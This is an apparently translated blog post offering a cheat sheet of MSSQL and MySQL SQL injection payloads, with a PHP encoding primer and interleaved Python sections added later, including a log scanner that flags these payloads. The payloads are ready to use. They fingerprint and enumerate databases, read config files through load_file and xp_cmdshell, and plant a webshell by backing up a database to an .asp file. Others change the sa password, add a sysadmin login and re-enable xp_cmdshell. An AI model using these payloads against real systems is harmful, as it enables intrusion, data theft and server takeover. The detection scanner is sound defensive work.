SQL injection in practice: common MsSQL injection commands

When your talent cannot yet support your ambition, you should settle down and study.

I found some common MsSQL injection commands on the Internet, summarized them and put them together here for easy reference.

Before getting into the topic, let's cover a few background terms. Some readers may have blind spots here; if you already know them, you can skip this part.

Table of contents

MsSQL common injection command summary
Determining the database type
1. webshell

A WebShell is a command execution environment in the form of a web file such as asp, php, jsp or cgi; it can also be called a web page backdoor. After breaking into a website, an attacker usually places these asp or php backdoor (trojan) files in the web server's site directory, mixed in with normal web files. The attacker can then control the server from a browser through the asp or php backdoor: uploading and downloading files, viewing the database, executing arbitrary system commands, and so on. Through the backdoor and vulnerabilities on the server, the attacker may also escalate privileges and reach other sites hosted on the same server.

Webshell traffic passes through the firewall: because it talks to the controlled server over port 80, it is not blocked. Using a webshell generally leaves no record in the system log, only some records of the submitted data in the web server's log, so an inexperienced administrator finds it hard to spot traces of the intrusion in the site's web log.

2. base64 encoding

Base64 is one of the most common encodings for transmitting 8-bit byte sequences over a network, and it is often used in HTTP environments to carry longer identification information.

Standard Base64 is not suitable for direct transmission in a URL, because the URL encoder turns the "/" and "+" characters of standard Base64 into "%XX" escapes, and those "%" signs have to be converted yet again when stored in a database, because ANSI SQL already uses "%" as a wildcard.

To solve this problem, an improved Base64 encoding for URLs can be used: it drops the trailing "=" padding and replaces the standard Base64 "+" and "/" with "-" and "_". This removes the conversions otherwise needed at URL encoding/decoding time and on database storage, avoids lengthening the encoded data in the process, and gives a uniform format for object identifiers such as database keys.
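The difference between the two alphabets described above, as an added Python example (not code from the original post). It encodes the same bytes with standard and URL-safe Base64, shows what a URL encoder does to the standard form, and restores the dropped "=" padding on decode. The three-byte input is chosen because it yields only "+" and "/" characters.

```python
import base64
from urllib.parse import quote


def url_safe_encode(data: bytes) -> str:
    """URL-safe Base64 as described above: '+' -> '-', '/' -> '_', no '=' padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def url_safe_decode(text: str) -> bytes:
    """Re-add the padding the encoder dropped (length must be a multiple of 4), then decode."""
    padding = "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text + padding)


def compare(data: bytes) -> dict:
    """Standard Base64, the same string after URL encoding, and the URL-safe variant."""
    std = base64.b64encode(data).decode("ascii")
    return {
        "standard": std,
        "standard_in_url": quote(std, safe=""),  # '+' and '/' become %2B and %2F
        "url_safe": url_safe_encode(data),
    }


if __name__ == "__main__":
    # Constructed input: 0xFB 0xFF 0xBF encodes to the 6-bit values 62,63,62,63 ('+','/','+','/')
    print(compare(bytes([0xFB, 0xFF, 0xBF])))
    print(compare(b"Ma"))  # two bytes, so standard Base64 pads with one '='
    print(url_safe_decode("TWE"))
```

The "%" signs in `standard_in_url` are exactly the characters the passage warns about: stored verbatim they collide with the SQL LIKE wildcard, while the URL-safe string contains none.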

3. base64 functions in PHP

base64_encode() function

Purpose: encodes a string with BASE64.

Syntax: string base64_encode(string data).

Return value: string.

Function type: encoding.

Description: this function encodes a string with MIME BASE64. The encoding lets text or images be transmitted over the network intact. A BASE64-encoded string contains only upper- and lower-case letters, Arabic numerals, the plus sign and the slash, 64 characters in total and no other special characters, hence the name BASE64. The encoded string is about 1/3 longer than the original. For more information see section 6.8 of RFC 2045.

E.g.:

<?php
$str = 'This is an encoded string';
echo base64_encode($str);
?>

base64_decode() function

Purpose: decodes data encoded with MIME base64.

Syntax: string base64_decode(string data).

Return value: string.

Function type: decoding.

Description: decodes a string that was encoded with base64_encode.

E.g.:

<?php
$str = 'd2VsbGNvbWUlMjB0byUyMGVyYW5nZSUyMQ==';
echo base64_decode($str); // prints wellcome%20to%20erange%21
?>
4. DEFLATE-related functions in PHP

DEFLATE is a lossless data compression algorithm that combines the LZ77 algorithm with Huffman coding.

gzdeflate() function

Purpose: compresses data with DEFLATE.

Syntax: string gzdeflate(string data).

Return value: string.

Function type: encoding.

E.g.:

<?php
$compressed = gzdeflate('Compress me', 9);
echo $compressed; // raw DEFLATE bytes, not printable text
?>

gzinflate() function

Purpose: decompresses DEFLATE-compressed data.

Syntax: string gzinflate(string data).

Return value: string.

Function type: decoding.

E.g.:

<?php
$compressed   = gzdeflate('Compress me', 9);
$uncompressed = gzinflate($compressed);
echo $uncompressed;
?>
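The same round trip in Python, as an added example that is not part of the original post. The point it adds is an interoperability detail: PHP's gzdeflate() emits a raw DEFLATE stream with no zlib header, so on the zlib side it must be handled with negative window bits, and a blob that does carry a header came from a different function (gzcompress()). The `is_zlib_wrapped` heuristic is my own helper, not a PHP or zlib API.

```python
import zlib

# Negative wbits selects a raw DEFLATE stream: no 2-byte zlib header, no Adler-32 trailer.
# This matches PHP's gzdeflate()/gzinflate() (ZLIB_ENCODING_RAW).
RAW_DEFLATE = -15


def php_gzdeflate(data: bytes, level: int = 9) -> bytes:
    """Equivalent of PHP gzdeflate($data, $level)."""
    c = zlib.compressobj(level, zlib.DEFLATED, RAW_DEFLATE)
    return c.compress(data) + c.flush()


def php_gzinflate(blob: bytes) -> bytes:
    """Equivalent of PHP gzinflate($data); rejects truncated streams instead of returning a prefix."""
    d = zlib.decompressobj(RAW_DEFLATE)
    out = d.decompress(blob) + d.flush()
    if not d.eof:
        raise ValueError("truncated or corrupt DEFLATE stream")
    return out


def is_zlib_wrapped(blob: bytes) -> bool:
    """Heuristic: a zlib header has CM=8 in the low nibble and CMF*256+FLG divisible by 31 (RFC 1950).
    Raw DEFLATE output (gzdeflate) fails this check; gzcompress()/zlib.compress output passes it."""
    return len(blob) >= 2 and (blob[0] & 0x0F) == 8 and ((blob[0] << 8) | blob[1]) % 31 == 0


if __name__ == "__main__":
    blob = php_gzdeflate(b"Compress me")
    print(blob.hex(), is_zlib_wrapped(blob))            # raw stream: False
    print(php_gzinflate(blob))                          # b'Compress me'
    print(is_zlib_wrapped(zlib.compress(b"Compress me")))  # zlib-wrapped: True
```

Feeding a gzdeflate() blob to plain `zlib.decompress()` fails with a header-check error; the `is_zlib_wrapped` test tells you which decoder to reach for before you try.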

MsSQL common injection command summary

Determining the database type:

Access:
and (select id from MSysAccessObjects)>0    returns normally: the database is Access
MSSQL:
and (select id from sysobjects)>0    returns normally: the database is MSSQL
MySQL:
and length(user())>0    returns normally: the database is MySQL

MySQL:
1. Determine the version: and ord(mid(version(),1,1))>51/*  A normal return means the version is above 4.0 and union queries can be used.
2. Brute-force the field count with order by: append order by 10/* to the URL. If the page returns normally, the field count is at least 10.
3. Then use union to determine the exact field count, e.g. order by or and 1=2 union select 1,2,3,....../* until the page returns normally, which gives the exact number of fields. If spaces are filtered, /**/ can be used in their place.
4. Check whether the database connection account has write permission: and (select count(*) from mysql.user)>0/*  If this returns an error, only the administrator account and password can be guessed.
5. If it returns normally, a file can possibly be read with and 1=2 union select 1,2,3,4,5,6,load_file(char(ascii values of the file path, separated by commas)),8,9,10/*
Note: load_file(char(...)) can also take the path in hexadecimal. Configuration files are read this way to find the database connection information.
6. Detect whether the account is root: and ord(mid(user(),1,1))=114/*
7. The MySQL built-in function hex() converts characters to hexadecimal, e.g. select hex(user()); unhex() decodes hexadecimal, e.g. select unhex(hex(user()))
8. The MySQL built-in function concat() combines several columns into one row, e.g. select concat(username,0x3A,password) from t_member
9. Commonly used built-in functions:
select system_user()    view the system user
select current_user()    query the current user
select user()    query the user
select version()    query the database version
select database()    query the currently connected database
select @@version_compile_os    query the current operating system
select @@datadir    query the database data path
select @@basedir    query the MySQL installation path
Remove limit 1,1 to list all rows; the first number is the row to start from and the second the number of rows to return. Increment the first number starting from 1; if the browser returns an error at 3, there are two databases/tables.
10. Query the databases:
union select concat(schema_name,0x3A) from information_schema.schemata limit 1,1
11. Query the tables:
union select table_name from information_schema.tables where table_schema='database name' limit 1,1

MSSQL:
Detect sysadmin (SA) privileges:
and 1=(select is_srvrolemember('sysadmin'));--
Detect db_owner privileges:
and 1=(select is_member('db_owner'))
List all databases: union select name from master.dbo.sysdatabases where dbid=1    (1 means the first database)
List all tables:
First table: union select top 1 name from dbname.dbo.sysobjects where xtype='U'
Second table: union select top 1 name from dbname.dbo.sysobjects where xtype='U' and name not in ('first table')
Third table: union select top 1 name from dbname.dbo.sysobjects where xtype='U' and name not in ('first table','second table')
...
List the columns:
Get the table ID: select id from seay.dbo.sysobjects where xtype='U' and name='admin'
First column: select top 1 name from seay.dbo.syscolumns where id=ID number
Second column: select top 1 name from seay.dbo.syscolumns where id=ID number and name not in ('first column')
...
Dump the data:
select column name from table name
master.dbo.xp_dirtree 'c:\';    traverse directories
exec master.dbo.xp_availablemedia;--    get all current drives
exec master.dbo.xp_subdirs 'c:\';--    get the list of subdirectories
exec master.dbo.xp_dirtree 'c:\';--    get the directory tree of all subdirectories
exec master.dbo.xp_cmdshell 'type c:\web\web.config';--    view the contents of a file
Back up the database: backup database dbname to disk='c:/1.asp';
MSSQL built-in functions:
select @@version    query the database version
select user_name()    query the user name of the current database connection
select db_name()    query the current database name
Change the sa password:
exec sp_password NULL,'new password','sa'
Add a user with sysadmin privileges:
exec sp_addlogin 'username','pass','master';
exec sp_addsrvrolemember 'username','sysadmin'

Detect whether multiple statements are supported:
;declare @d int;--
Stop or start a service:
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
Unpack a file:
xp_unpackcab 'c:\test.cab','c:\temp',1

Restore xp_cmdshell:
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
Enable sandbox mode:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
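Every command in the summary above leaves a characteristic token in the request that reaches the web server (the system tables used for fingerprinting, information_schema, union select, load_file, the is_*member role checks, the xp_/sp_ procedures). As an added example that is not part of the original post, the Python below turns those tokens into a small triage scanner for web access logs. It undoes the two evasions the summary itself mentions, URL encoding and /**/ in place of spaces, before matching. The log lines are constructed for the demo and the indicator names are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicator classes built only from the command summary above.
INDICATORS = {
    "db_fingerprint": re.compile(r"\b(msysaccessobjects|sysobjects|mysql\.user)\b"),
    "union_enum": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "schema_enum": re.compile(r"\b(information_schema\.\w+|sysdatabases|syscolumns)\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "role_check": re.compile(r"\bis_(srvrolemember|member)\s*\("),
    "ext_proc": re.compile(
        r"\b(xp_cmdshell|xp_dirtree|xp_subdirs|xp_availablemedia|xp_regwrite|"
        r"xp_servicecontrol|xp_unpackcab|sp_addextendedproc|sp_addlogin|"
        r"sp_addsrvrolemember|sp_password)\b"
    ),
    "sysvar": re.compile(r"@@(version|datadir|basedir|version_compile_os)\b"),
}

# Common Log Format: ip ident user [time] "method path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(query: str) -> str:
    """Undo URL encoding (twice, to catch %25-nested escapes) and the /**/ space substitute."""
    s = unquote_plus(unquote_plus(query))
    s = re.sub(r"/\*.*?\*/", " ", s)  # inline comments used where spaces are filtered
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(query: str) -> list:
    """Names of the indicator classes present in one query string, sorted."""
    text = normalize(query)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_log(log_text: str) -> list:
    """(client ip, status, indicator names) for each request whose query string matches."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("path").partition("?")[2]
        tags = classify(query) if query else []
        if tags:
            hits.append((m.group("ip"), int(m.group("status")), tags))
    return hits


# Constructed sample lines (no real server); the payloads are the ones from the summary above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /news.asp?id=12%20and%20(select%20id%20from%20sysobjects)%3E0 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /news.asp?id=12%20and%201=(select%20is_srvrolemember('sysadmin'));-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /item.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2,load_file(0x633a5c636f6e6669672e706870)/* HTTP/1.1" 500 312
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /news.asp?id=12;exec%20master..xp_cmdshell%20'type%20c:%5Cweb%5Cweb.config';-- HTTP/1.1" 200 77
"""

if __name__ == "__main__":
    for ip, status, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(tags)}")
```

The scanner confirms what the webshell section says about logging: nothing reaches the system log, but the web log keeps the submitted data, so this is where the traces are. A 200 next to an ext_proc hit is the line to look at first; a 500 on a union/load_file probe usually means the guess failed and the attempt is still in progress. The root-cause fix stays parameterized queries and a low-privilege database login, for which is_srvrolemember('sysadmin') should return 0.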

Source: blog.51cto.com/14536975/2438317